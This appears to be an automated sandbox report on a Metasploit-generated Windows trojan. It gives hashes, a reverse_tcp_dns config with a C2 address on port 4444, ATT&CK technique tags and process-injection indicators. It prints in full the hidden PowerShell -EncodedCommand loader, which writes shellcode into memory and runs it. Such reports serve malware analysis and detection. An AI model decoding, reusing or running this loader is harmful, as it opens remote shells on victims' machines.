metasploit | ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8

General

Target

0f7fff304e0fe1a4bc0ca5eef9d34cdb6d2b43a9.exe
Size

17KB
MD5

f8a9322518123f8dfa7e2e4b02e21656
SHA1

0f7fff304e0fe1a4bc0ca5eef9d34cdb6d2b43a9
SHA256

ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8
SHA512

fca2e548bb333ac59a4803ab783c5b4bfb466c5f7f59bcb787675db7c4444beafae9fe97beeb272c680f1573f204b864cd06a95cfcfb863e15f4c489732d3bae
SSDEEP

384:OEEoLO56ayzcMj+uZvAc00EUGvQPCcmL6neqlkXMj/79Wx:RE8O56lcVuGv0TPCcfexX+79Wx

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp_dns

C2

190.130.88.59:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
14	3280	powershell.exe
14	3280	powershell.exe
14	3280	powershell.exe
14	3280	powershell.exe
14	3280	powershell.exe
14	3280	powershell.exe
14	3280	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2548 powershell.exe

pid	process
2548	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.execsc.execvtres.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2548 powershell.exe
2548 powershell.exe
3280 powershell.exe
3280 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2548 powershell.exe
Token: SeDebugPrivilege 3280 powershell.exe

pid	process
2548	powershell.exe
2548	powershell.exe
3280	powershell.exe
3280	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	3280	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

0f7fff304e0fe1a4bc0ca5eef9d34cdb6d2b43a9.execmd.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 4732 wrote to memory of 3296	4732	0f7fff304e0fe1a4bc0ca5eef9d34cdb6d2b43a9.exe	cmd.exe
PID 4732 wrote to memory of 3296	4732	0f7fff304e0fe1a4bc0ca5eef9d34cdb6d2b43a9.exe	cmd.exe
PID 3296 wrote to memory of 2548	3296	cmd.exe	powershell.exe
PID 3296 wrote to memory of 2548	3296	cmd.exe	powershell.exe
PID 2548 wrote to memory of 3280	2548	powershell.exe	powershell.exe
PID 2548 wrote to memory of 3280	2548	powershell.exe	powershell.exe
PID 2548 wrote to memory of 3280	2548	powershell.exe	powershell.exe
PID 3280 wrote to memory of 1892	3280	powershell.exe	csc.exe
PID 3280 wrote to memory of 1892	3280	powershell.exe	csc.exe
PID 3280 wrote to memory of 1892	3280	powershell.exe	csc.exe
PID 1892 wrote to memory of 1612	1892	csc.exe	cvtres.exe
PID 1892 wrote to memory of 1612	1892	csc.exe	cvtres.exe
PID 1892 wrote to memory of 1612	1892	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\0f7fff304e0fe1a4bc0ca5eef9d34cdb6d2b43a9.exe
"C:\Users\Admin\AppData\Local\Temp\0f7fff304e0fe1a4bc0ca5eef9d34cdb6d2b43a9.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAA5AFQARAAgAD0AIAAnACQAYgBNAFkASAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABiAE0AWQBIACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABjAGIALAAwAHgAYgBmACwAMAB4ADkANwAsADAAeAA5ADgALAAwAHgANQA1ACwAMAB4ADEAMAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADUAMAAsADAAeAAzADEALAAwAHgANwBkACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANwBkACwAMAB4ADEANgAsADAAeABlADIALAAwAHgANgAyACwAMAB4ADYANAAsADAAeABiAGQALAAwAHgAOQBmACwAMAB4ADgAYwAsADAAeAA5ADUALAAwAHgAMwBlACwAMAB4AGMAMAAsADAAeABiAGQALAAwAHgANAA3ACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAZQBmACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgANgBlACwAMAB4ADgANAAsADAAeABjAGEALAAwAHgAMgAwACwAMAB4AGYAYQAsADAAeABjADgALAAwAHgAZgBlACwAMAB4ADAAOQAsADAAeAAwADMALAAwAHgAZQAzACwAMAB4ADQAOQAsADAAeAAyADMALAAwAHgAZABkACwAMAB4ADcAMAAsADAAeABjADcALAAwAHgAOQBjACwAMAB4ADEAMAAsADAAeAA0ADYALAAwAHgAOAA0ACwAMAB4AGUAMQAsADAAeAAzADMALAAwAHgAMwBhACwAMAB4AGQANwAsADAAeAAzADUALAAwAHgAOQA0ACwAMAB4ADAAMwAsADAAeAAxADgALAAwAHgANAA4ACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAZQBlACwAMAB4ADIANgAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADcAYQAsADAAeAA5AGEALAAwAHgAZAA0ACwAMAB4ADEANwAsADAAeAAzAGUALAAwAHgAMgA3ACwAMAB4AGQANAAsADAAeABmADcALAAwAHgAMwA0ACwAMAB4ADEANwAsADAAeABhAGUALAAwAHgAYQAwACwAMAB4AGMAZgAsADAAeAA1ADgALAAwAHgAMwBhACwAMAB4ADAAMgAsADAAeABkADEALAAwAHgAOAA4ACwAMAB4ADkAMwAsADAAeAAxADEALAAwAHgAOQA5ACwAMAB4ADMAMAAsADAAeAA5AGYALAAwAHgANwBkACwAMAB4ADMAYQAsADAAeAA0ADAALAAwAHgANABjACwAMAB4AGYAOAAsADAAeABmADMALAAwAHgAMwA2ACwAMAB4ADQAZQAsADAAeAA0AGIALAAwAHgAMwA1ACwAMAB4ADQAOAAsADAAeAAyADUALAAwAHgANwBmACwAMAB4AGIAZQAsADAAeABiADcALAAwAHgAZQBjACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgAMQBiACwAMAB4AGQAMQAsADAAeAA3AGYALAAwAHgAOABkACwAMAB4ADYANQAsADAAeAAxADUALAAwAHgANAA3ACwAMAB4ADYAZQAsADAAeAAxADAALAAwAHgANgBkACwAMAB4AGIANAAsADAAeAAxADMALAAwAHgAMgAzACwAMAB4AGIANgAsADAAeABjADcALAAwAHgAYwBmACwAMAB4AGEANgAsADAAeAAyADkALAAwAHgANgBmACwAMAB4ADkAYgAsADAAeAAxADEALAAwAHgAOABlACwAMAB4ADgAZQAsADAAeAA0ADgALAAwAHgAYwA3ACwAMAB4ADQANQAsADAAeAA5AGMALAAwAHgAMgA1ACwAMAB4ADgAMwAsADAAeAAwADIALAAwAHgAOAAwACwAMAB4AGIAOAAsADAAeAA0ADAALAAwAHgAMwA5ACwAMAB4AGIAYwAsADAAeAAzADEALAAwAHgANgA3ACwAMAB4AGUAZQAsADAAeAAzADUALAAwAHgAMAAxACwAMAB4ADQAYwAsADAAeAAyAGEALAAwAHgAMQBlACwAMAB4AGQAMQAsADAAeABlAGQALAAwAHgANgBiACwAMAB4AGYAYQAsADAAeABiADQALAAwAHgAMQAyACwAMAB4ADYAYgAsADAAeABhADIALAAwAHgANgA5ACwAMAB4AGIANwAsADAAeABlADcALAAwAHgANAAwACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgAMAA3ACwAMAB4ADkAYgAsADAAeAA4ADAALAAwAHgAOQA1ACwAMAB4ADkAZgAsADAAeAA1ADAALAAwAHgANABkACwAMAB4ADIANgAsADAAeAA2ADAALAAwAHgAZgBlACwAMAB4AGMANgAsADAAeAA1ADUALAAwAHgANQAyACwAMAB4AGEAMQAsADAAeAA3AGMALAAwAHgAZgAyACwAMAB4AGQAZQAsADAAeAAyAGEALAAwAHgANQBiACwAMAB4ADAANQAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4ADEAYgAsADAAeAA5ADkALAAwAHgAZABmACwAMAB4AGEAOQAsADAAeAA1AGMALAAwAHgAYgAzACwAMAB4ADEAYgAsADAAeABmAGQALAAwAHgAMABjACwAMAB4AGEAYgAsADAAeAA4AGEALAAwAHgANwBkACwAMAB4AGMANwAsADAAeAAyAGIALAAwAHgAMwAyACwAMAB4AGEAOAAsADAAeAA0ADgALAAwAHgANwBjACwAMAB4ADkAYwAsADAAeAAwADIALAAwAHgAMgA5ACwAMAB4ADIAYwAsADAAeAA1AGMALAAwAHgAZgAyACwAMAB4AGMAMQAsADAAeAAyADYALAAwAHgANQAzACwAMAB4ADIAZAAsADAAeABmADEALAAwAHgANAA4ACwAMAB4AGIAOQAsADAAeAA0ADYALAAwAHgAMQBhACwAMAB4AGIAOAAsADAAeAA0ADIALAAwAHgANgA4ACwAMAB4AGQAYgAsADAAeABmADQALAAwAHgANwBiACwAMAB4ADUAOAAsADAAeABmADUALAAwAHgAYwA3ACwAMAB4ADQAOAAsADAAeABhADgALAAwAHgAMgA3ACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAZQA2ACwAMAB4ADAAMgAsADAAeAA1ADkALAAwAHgAZQA3ACwAMAB4ADkAZQAsADAAeABjADUALAAwAHgAYgAxACwAMAB4AGQAMwAsADAAeABkAGUALAAwAHgAZQA5ACwAMAB4ADEANwAsADAAeAA5ADAALAAwAHgAOQBlACwAMAB4ADAAOQAsADAAeABmADIALAAwAHgAYQBkACwAMAB4ADQAZQAsADAAeAA1AGEALAAwAHgAMAAwACwAMAB4AGIAMgAsADAAeAA3AGYALAAwAHgAYwA2ACwAMAB4ADgAZAAsADAAeAA1ADQALAAwAHgAMQA1ACwAMAB4AGUANgAsADAAeABkAGIALAAwAHgAYwBmACwAMAB4ADgAMQAsADAAeAA5AGYALAAwAHgANAAxACwAMAB4ADkAYgAsADAAeAAzADAALAAwAHgANQBmACwAMAB4ADUAYwAsADAAeABlADEALAAwAHgANwAyACwAMAB4AGUAYgAsADAAeAA1ADMALAAwAHgAMQA1ACwAMAB4ADMAYwAsADAAeAAxAGMALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeABhADgALAAwAHgAZQBjACwAMAB4ADUANAAsADAAeAA3ADcALAAwAHgANwBlACwAMAB4AGYAMgAsADAAeAA0ADIALAAwAHgAMQAyACwAMAB4ADcAZQAsADAAeAA2ADYALAAwAHgANgA5ACwAMAB4AGIANQAsADAAeAAyADkALAAwAHgAMQBlACwAMAB4ADcAMwAsADAAeABlADAALAAwAHgAMQBkACwAMAB4ADgAMQAsADAAeAA4AGMALAAwAHgAYwA3ACwAMAB4ADEANgAsADAAeAAwADgALAAwAHgAMQA5ACwAMAB4AGEAOAAsADAAeAA0ADAALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAAyADgALAAwAHgAOQAwACwAMAB4ADIAMwAsADAAeAA4ADcALAAwAHgAMgA4ACwAMAB4AGYAOAAsADAAeAA5ADMALAAwAHgAZgAzACwAMAB4ADcAYQAsADAAeAAxAGQALAAwAHgAZABjACwAMAB4ADIAOQAsADAAeABlAGYALAAwAHgAOABlACwAMAB4ADQAOQAsADAAeABkADIALAAwAHgANAA2ACwAMAB4ADYAMwAsADAAeABkADkALAAwAHgAYgBhACwAMAB4ADYANAAsADAAeAA1AGEALAAwAHgAMgBkACwAMAB4ADYANQAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGEAZgAsADAAeAA1ADkALAAwAHgANAAxACwAMAB4AGYANwAsADAAeABjADUALAAwAHgAYgAzACwAMAB4ADUAMQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAcQBTAFkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHEAUwBZAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABxAFMAWQAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADkAVABEACkAKQA7ACQATwAzAFgAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABXAGYATABnACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAFcAZgBMAGcAIAAkAE8AMwBYACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAE8AMwBYACAAJABlACIAOwB9AA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAA5AFQARAAgAD0AIAAnACQAYgBNAFkASAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABiAE0AWQBIACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABjAGIALAAwAHgAYgBmACwAMAB4ADkANwAsADAAeAA5ADgALAAwAHgANQA1ACwAMAB4ADEAMAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADUAMAAsADAAeAAzADEALAAwAHgANwBkACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANwBkACwAMAB4ADEANgAsADAAeABlADIALAAwAHgANgAyACwAMAB4ADYANAAsADAAeABiAGQALAAwAHgAOQBmACwAMAB4ADgAYwAsADAAeAA5ADUALAAwAHgAMwBlACwAMAB4AGMAMAAsADAAeABiAGQALAAwAHgANAA3ACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAZQBmACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgANgBlACwAMAB4ADgANAAsADAAeABjAGEALAAwAHgAMgAwACwAMAB4AGYAYQAsADAAeABjADgALAAwAHgAZgBlACwAMAB4ADAAOQAsADAAeAAwADMALAAwAHgAZQAzACwAMAB4ADQAOQAsADAAeAAyADMALAAwAHgAZABkACwAMAB4ADcAMAAsADAAeABjADcALAAwAHgAOQBjACwAMAB4ADEAMAAsADAAeAA0ADYALAAwAHgAOAA0ACwAMAB4AGUAMQAsADAAeAAzADMALAAwAHgAMwBhACwAMAB4AGQANwAsADAAeAAzADUALAAwAHgAOQA0ACwAMAB4ADAAMwAsADAAeAAxADgALAAwAHgANAA4ACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAZQBlACwAMAB4ADIANgAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADcAYQAsADAAeAA5AGEALAAwAHgAZAA0ACwAMAB4ADEANwAsADAAeAAzAGUALAAwAHgAMgA3ACwAMAB4AGQANAAsADAAeABmADcALAAwAHgAMwA0ACwAMAB4ADEANwAsADAAeABhAGUALAAwAHgAYQAwACwAMAB4AGMAZgAsADAAeAA1ADgALAAwAHgAMwBhACwAMAB4ADAAMgAsADAAeABkADEALAAwAHgAOAA4ACwAMAB4ADkAMwAsADAAeAAxADEALAAwAHgAOQA5ACwAMAB4ADMAMAAsADAAeAA5AGYALAAwAHgANwBkACwAMAB4ADMAYQAsADAAeAA0ADAALAAwAHgANABjACwAMAB4AGYAOAAsADAAeABmADMALAAwAHgAMwA2ACwAMAB4ADQAZQAsADAAeAA0AGIALAAwAHgAMwA1ACwAMAB4ADQAOAAsADAAeAAyADUALAAwAHgANwBmACwAMAB4AGIAZQAsADAAeABiADcALAAwAHgAZQBjACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgAMQBiACwAMAB4AGQAMQAsADAAeAA3AGYALAAwAHgAOABkACwAMAB4ADYANQAsADAAeAAxADUALAAwAHgANAA3ACwAMAB4ADYAZQAsADAAeAAxADAALAAwAHgANgBkACwAMAB4AGIANAAsADAAeAAxADMALAAwAHgAMgAzACwAMAB4AGIANgAsADAAeABjADcALAAwAHgAYwBmACwAMAB4AGEANgAsADAAeAAyADkALAAwAHgANgBmACwAMAB4ADkAYgAsADAAeAAxADEALAAwAHgAOABlACwAMAB4ADgAZQAsADAAeAA0ADgALAAwAHgAYwA3ACwAMAB4ADQANQAsADAAeAA5AGMALAAwAHgAMgA1ACwAMAB4ADgAMwAsADAAeAAwADIALAAwAHgAOAAwACwAMAB4AGIAOAAsADAAeAA0ADAALAAwAHgAMwA5ACwAMAB4AGIAYwAsADAAeAAzADEALAAwAHgANgA3ACwAMAB4AGUAZQAsADAAeAAzADUALAAwAHgAMAAxACwAMAB4ADQAYwAsADAAeAAyAGEALAAwAHgAMQBlACwAMAB4AGQAMQAsADAAeABlAGQALAAwAHgANgBiACwAMAB4AGYAYQAsADAAeABiADQALAAwAHgAMQAyACwAMAB4ADYAYgAsADAAeABhADIALAAwAHgANgA5ACwAMAB4AGIANwAsADAAeABlADcALAAwAHgANAAwACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgAMAA3ACwAMAB4ADkAYgAsADAAeAA4ADAALAAwAHgAOQA1ACwAMAB4ADkAZgAsADAAeAA1ADAALAAwAHgANABkACwAMAB4ADIANgAsADAAeAA2ADAALAAwAHgAZgBlACwAMAB4AGMANgAsADAAeAA1ADUALAAwAHgANQAyACwAMAB4AGEAMQAsADAAeAA3AGMALAAwAHgAZgAyACwAMAB4AGQAZQAsADAAeAAyAGEALAAwAHgANQBiACwAMAB4ADAANQAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4ADEAYgAsADAAeAA5ADkALAAwAHgAZABmACwAMAB4AGEAOQAsADAAeAA1AGMALAAwAHgAYgAzACwAMAB4ADEAYgAsADAAeABmAGQALAAwAHgAMABjACwAMAB4AGEAYgAsADAAeAA4AGEALAAwAHgANwBkACwAMAB4AGMANwAsADAAeAAyAGIALAAwAHgAMwAyACwAMAB4AGEAOAAsADAAeAA0ADgALAAwAHgANwBjACwAMAB4ADkAYwAsADAAeAAwADIALAAwAHgAMgA5ACwAMAB4ADIAYwAsADAAeAA1AGMALAAwAHgAZgAyACwAMAB4AGMAMQAsADAAeAAyADYALAAwAHgANQAzACwAMAB4ADIAZAAsADAAeABmADEALAAwAHgANAA4ACwAMAB4AGIAOQAsADAAeAA0ADYALAAwAHgAMQBhACwAMAB4AGIAOAAsADAAeAA0ADIALAAwAHgANgA4ACwAMAB4AGQAYgAsADAAeABmADQALAAwAHgANwBiACwAMAB4ADUAOAAsADAAeABmADUALAAwAHgAYwA3ACwAMAB4ADQAOAAsADAAeABhADgALAAwAHgAMgA3ACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAZQA2ACwAMAB4ADAAMgAsADAAeAA1ADkALAAwAHgAZQA3ACwAMAB4ADkAZQAsADAAeABjADUALAAwAHgAYgAxACwAMAB4AGQAMwAsADAAeABkAGUALAAwAHgAZQA5ACwAMAB4ADEANwAsADAAeAA5ADAALAAwAHgAOQBlACwAMAB4ADAAOQAsADAAeABmADIALAAwAHgAYQBkACwAMAB4ADQAZQAsADAAeAA1AGEALAAwAHgAMAAwACwAMAB4AGIAMgAsADAAeAA3AGYALAAwAHgAYwA2ACwAMAB4ADgAZAAsADAAeAA1ADQALAAwAHgAMQA1ACwAMAB4AGUANgAsADAAeABkAGIALAAwAHgAYwBmACwAMAB4ADgAMQAsADAAeAA5AGYALAAwAHgANAAxACwAMAB4ADkAYgAsADAAeAAzADAALAAwAHgANQBmACwAMAB4ADUAYwAsADAAeABlADEALAAwAHgANwAyACwAMAB4AGUAYgAsADAAeAA1ADMALAAwAHgAMQA1ACwAMAB4ADMAYwAsADAAeAAxAGMALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeABhADgALAAwAHgAZQBjACwAMAB4ADUANAAsADAAeAA3ADcALAAwAHgANwBlACwAMAB4AGYAMgAsADAAeAA0ADIALAAwAHgAMQAyACwAMAB4ADcAZQAsADAAeAA2ADYALAAwAHgANgA5ACwAMAB4AGIANQAsADAAeAAyADkALAAwAHgAMQBlACwAMAB4ADcAMwAsADAAeABlADAALAAwAHgAMQBkACwAMAB4ADgAMQAsADAAeAA4AGMALAAwAHgAYwA3ACwAMAB4ADEANgAsADAAeAAwADgALAAwAHgAMQA5ACwAMAB4AGEAOAAsADAAeAA0ADAALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAAyADgALAAwAHgAOQAwACwAMAB4ADIAMwAsADAAeAA4ADcALAAwAHgAMgA4ACwAMAB4AGYAOAAsADAAeAA5ADMALAAwAHgAZgAzACwAMAB4ADcAYQAsADAAeAAxAGQALAAwAHgAZABjACwAMAB4ADIAOQAsADAAeABlAGYALAAwAHgAOABlACwAMAB4ADQAOQAsADAAeABkADIALAAwAHgANAA2ACwAMAB4ADYAMwAsADAAeABkADkALAAwAHgAYgBhACwAMAB4ADYANAAsADAAeAA1AGEALAAwAHgAMgBkACwAMAB4ADYANQAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGEAZgAsADAAeAA1ADkALAAwAHgANAAxACwAMAB4AGYANwAsADAAeABjADUALAAwAHgAYgAzACwAMAB4ADUAMQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAcQBTAFkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHEAUwBZAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgAD